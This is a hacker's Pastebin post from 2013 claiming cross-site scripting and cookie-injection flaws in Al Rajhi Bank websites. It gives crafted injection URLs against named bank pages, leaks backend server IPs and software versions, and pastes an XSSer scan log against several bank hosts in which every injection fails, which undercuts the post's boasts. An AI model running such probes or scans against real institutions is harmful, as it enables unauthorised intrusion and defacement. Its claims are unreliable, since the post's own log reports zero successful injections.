Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Xss Injection
- On : www.alrajhibank.com.sa
- مصرف الراجحي , ثغرة حقن الكوكيز
- By JM511 #www.twitter.com/JM511
- Follow me more information
- ========================================
- Greeting to :
- #in3ctor Q8 , #JiNnI-LB #Zombie_JM #Sec-Q8 #Dr.ExE #GolDen-Z3r0 #Sarbot511
- 2013/2/7
- -------------- SUU ------------------
- ========================================
- msg to n00bs: _!_
- Version
- webapp : cui-sv_wls113.0_37_140912
- jsLibrary : WDS_JSLIBRARY_V54_050110
- tagLibrary : 1.0-24
- Backend : ETV-JEDSV08AA 194.76.166.179
- SI : 1ASIXJCPSV 194.76.166.67
- eRetail Engine :
- http://www.alrajhibank.com.sa/ar/Pages/Alrajhi_results.aspx?k=1%27
- http://www.alrajhi-capital.com/ar/brokerage/echannels/Pages/%22%3EHacked%20by%20JM511
- http://www.alrajhibank.com.sa/en/pages/default.aspx%22%3EHacked%20by%20JM511
- http://career.alrajhibank.com.sa/%22%3EHacked%20by%20JM511
- http://www.alrajhibank.com.sa/en/media-centre/pages/events.aspx%22%3EHacked%20by%20JM511
- http://www.alrajhibank.com.sa/en/business/cash-management/pages/%22%3EHacked%20by%20jm511
- when u run ur fucker mind u wll c that :)
- i cut some of shit cuz n00bs ;)
- ===========================================================================
- XSSer v1.6 (beta): "Grey Swarm!" - 2011/2012 - (GPLv3.0) -> by psy
- ===========================================================================
- Testing [XSS from Dork] injections...good luck ;)
- ===========================================================================
- ===========================================================================
- Target: http://career.alrajhibank.com.sa/ --> 2012-10-27 05:52:29.660518
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: d8a66d4f2366f456ae5efc09e6a439ff
- [+] Trying: http://career.alrajhibank.com.sa/">d8a66d4f2366f456ae5efc09e6a439ff
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Server: nginx
- Date: Sat, 27 Oct 2012 02:52:38 GMT
- Connection: keep-alive
- Keep-Alive: timeout=5
- Pragma: no-cache
- Cache-Control: private, no-cache, no-cache="Set-Cookie", no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
- Expires: Mon, 3 Jul 2000 15:55:03 GMT
- Set-Cookie: user-prefs=locale {} lang en; Path=/
- MIME-Version: 1.0
- Content-Length: 15
- http-code: 404
- total-time: 0.881931
- namelookup-time: 0.38018
- connect-time: 0.584797
- header-size: 438
- request-size: 294
- response-code: 404
- ssl-verifyresult: 0
- content-type: text/html; charset=utf-8
- cookielist: ['career.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tuser-prefs\tlocale {} lang en']
- ---------------------------------------------
- [-] Injection Results:
- 404 Not Found: The server has not found anything matching the Request-URI
- ===========================================================================
- Target: http://www.alrajhibank.com.sa/ar/pages/default.aspx --> 2012-10-27 05:52:29.660518
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 3383787634ef2d85f8879939976aba0d
- [+] Trying: http://www.alrajhibank.com.sa/ar/pages/default.aspx/">3383787634ef2d85f8879939976aba0d
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Date: Sat, 27 Oct 2012 02:52:38 GMT
- Connection: close
- Content-Length: 34
- Set-Cookie: NSC_BmSbkijOfxQpsubm=ffffffffaf181d1e45525d5f4f58455e445a4a423660;path=/;httponly
- http-code: 400
- total-time: 0.265311
- namelookup-time: 0.186291
- connect-time: 0.223349
- header-size: 224
- request-size: 313
- response-code: 400
- ssl-verifyresult: 0
- content-type: text/html
- cookielist: ['#HttpOnly_www.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tNSC_BmSbkijOfxQpsubm\tffffffffaf181d1e45525d5f4f58455e445a4a423660']
- ---------------------------------------------
- [-] Injection Results:
- 400 Bad Request: The request could not be understood by the server due to malformed syntax
- ===========================================================================
- Target: http://www.alrajhibank.com.sa/en/pages/default.aspx --> 2012-10-27 05:52:29.660518
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 59b614b559bfdea055561b402b977701
- [+] Trying: http://www.alrajhibank.com.sa/en/pages/default.aspx/">59b614b559bfdea055561b402b977701
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Date: Sat, 27 Oct 2012 02:52:39 GMT
- Connection: close
- Content-Length: 34
- Set-Cookie: NSC_BmSbkijOfxQpsubm=ffffffffaf181d1e45525d5f4f58455e445a4a423660;path=/;httponly
- http-code: 400
- total-time: 0.257742
- namelookup-time: 0.179871
- connect-time: 0.217707
- header-size: 224
- request-size: 313
- response-code: 400
- ssl-verifyresult: 0
- content-type: text/html
- cookielist: ['#HttpOnly_www.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tNSC_BmSbkijOfxQpsubm\tffffffffaf181d1e45525d5f4f58455e445a4a423660']
- ---------------------------------------------
- [-] Injection Results:
- 400 Bad Request: The request could not be understood by the server due to malformed syntax
- ===========================================================================
- ===========================================================================
- Target: http://career.alrajhibank.com.sa/ar/ --> 2012-10-27 05:52:29.660518
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 2317523b668150612031539414d1f1f2
- [+] Trying: http://career.alrajhibank.com.sa/ar/">2317523b668150612031539414d1f1f2
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Server: nginx
- Date: Sat, 27 Oct 2012 02:52:44 GMT
- Connection: keep-alive
- Keep-Alive: timeout=5
- Pragma: no-cache
- Cache-Control: private, no-cache, no-cache="Set-Cookie", no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
- Expires: Mon, 3 Jul 2000 15:55:03 GMT
- Set-Cookie: user-prefs=locale {} lang en; Path=/
- MIME-Version: 1.0
- Content-Length: 15
- http-code: 404
- total-time: 0.771837
- namelookup-time: 0.270268
- connect-time: 0.475814
- header-size: 438
- request-size: 297
- response-code: 404
- ssl-verifyresult: 0
- content-type: text/html; charset=utf-8
- cookielist: ['career.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tuser-prefs\tlocale {} lang en']
- ---------------------------------------------
- [-] Injection Results:
- [+] Checking: url attack with ">PAYLOAD... fail
- Searching hash: 363335a0b7f70b40eb322803bf3ad6b0 in target source code...
- Injection failed!
- ===========================================================================
- Target: http://www.app1.alrajhibank.com.sa/calculators/default.aspx?lang=ar/ --> 2012-10-27 05:52:29.660518
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 7ad4f24ee8888fcbdd3dbfb905f6bcaf
- [+] Trying: http://www.app1.alrajhibank.com.sa/calculators/default.aspx?lang=ar/">7ad4f24ee8888fcbdd3dbfb905f6bcaf
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Connection: close
- Date: Sat, 27 Oct 2012 02:52:45 GMT
- Server: Microsoft-IIS/6.0
- X-Powered-By: ASP.NET
- X-AspNet-Version: 2.0.50727
- Location: /calculators/default.aspx?lang=ar/">7ad4f24ee8888fcbdd3dbfb905f6bcaf&AspxAutoDetectCookieSupport=1
- Set-Cookie: AspxAutoDetectCookieSupport=1; path=/
- Cache-Control: private
- Set-Cookie: NSC_BmSbkijOfxQpsubm=ffffffffaf181d0145525d5f4f58455e445a4a423660;path=/;httponly
- http-code: 302
- total-time: 0.317241
- namelookup-time: 0.238896
- connect-time: 0.275696
- header-size: 462
- request-size: 329
- response-code: 302
- ssl-verifyresult: 0
- content-type: text/html
- cookielist: ['www.app1.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tAspxAutoDetectCookieSupport\t1', '#HttpOnly_www.app1.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tNSC_BmSbkijOfxQpsubm\tffffffffaf181d0145525d5f4f58455e445a4a423660']
- ---------------------------------------------
- [-] Injection Results:
- [+] Checking: url attack with ">PAYLOAD... fail
- Searching hash: 7ad4f24ee8888fcbdd3dbfb905f6bcaf in target source code...
- Injection failed!
- ===========================================================================
- Target: https://eservice.alrajhibank.com.sa/AOW?Lang=AR --> 2012-10-27 05:52:29.660518
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 6d818ea918ce8691bee997249a545680
- [+] Trying: https://eservice.alrajhibank.com.sa/AOW?Lang=AR/">6d818ea918ce8691bee997249a545680
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- http-code: 500
- total-time: 0.642949
- namelookup-time: 0.147325
- connect-time: 0.182972
- header-size: 265
- request-size: 308
- response-code: 500
- ssl-verifyresult: 0
- content-type: text/html; charset=utf-8
- cookielist: []
- ---------------------------------------------
- [-] Injection Results:
- 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request
- Mosquito(s) landed!
- ===========================================================================
- [*] Final Results:
- ===========================================================================
- - Injections: 9
- - Failed: 9
- - Sucessfull: 0
- - Accur: 0 %
- ===========================================================================
- ===========================================================================
- [*] Statistic:
- ===========================================================================
- --------------------------------------------------
- Test Time Duration: 0:00:20.604619
- --------------------------------------------------
- Total Connections: 19
- -------------------------
- 200-OK: 11 | 404: 5 | 503: 0 | Others: 3
- Connec: 57 %
- --------------------------------------------------
- Total Payloads: 9
- -------------------------
- Checker: 0 | Manual: 0 | Auto: 9 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
- --------------------------------------------------
- Total Injections: 9
- -------------------------
- Failed: 9 | Sucessfull: 0
- Accur : 0 %
- -------------------------
- Total Discovered: 0
- -------------------------
- Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
- --------------------------------------------------
- False positives: 0 | Vulnerables: 0
- -------------------------
- Mana: 0
- --------------------------------------------------
- [I] Could not find any vulnerability!. Try another combination or hack it -manually- :)
- ===========================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement